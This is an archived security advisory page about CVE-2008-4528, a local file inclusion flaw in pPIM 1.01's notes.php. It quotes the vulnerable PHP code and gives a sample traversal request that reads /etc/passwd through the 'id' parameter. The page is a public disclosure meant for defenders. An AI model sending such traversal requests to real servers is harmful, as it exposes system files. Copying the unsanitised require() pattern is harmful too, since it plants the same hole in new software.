SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability


Arrow  SecurityAlert : 4390
Arrow  CVE : CVE-2008-4528
Arrow  CWE : CWE-22
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
  ExploitAlert :   4849
Arrow  Credit : JosS
Arrow  Published : 10.10.2008

Arrow  Affected Software : phlatline:personal_information_manager:1.01



Arrow  Advisory Content :  

# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
# url: http://www.phlatline.org/docs/files/ppim.zip
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.


description of vulnerability:
-----------------------------------------------
the variable 'id' has been not defined in code
and the variable 'id' is sent by the users.
-----------------------------------------------

vuln file: notes.php

vuln code:
x: >...
107: if (isset($_GET["mode"]))

{

if ($_GET["mode"]=="edit")

{

if (isset($_GET['id']))

{

$notefile = $_GET['id'];

if ($notefile == "new")

{

$title = "";

$notes = "";

}

else

{

$temp = "notes/" . $notefile;

require($temp);

123: }
x: <...
x: }}}

exploit: GET /notes.php?mode=edit&id=[file]
sample (xpl):
http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../
../etc/passwd





Arrow  References :

http://securityreason.com/expldownload/1/4849/1 (Exploit)
http://www.securityfocus.com/bid/31571
http://www.milw0rm.com/exploits/6667




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

» PHP 5.3.0 5.2.11
   posix_mkfifo()
   open_basedir bypass

Copyright © SecurityReason.com. All Rights Reserved.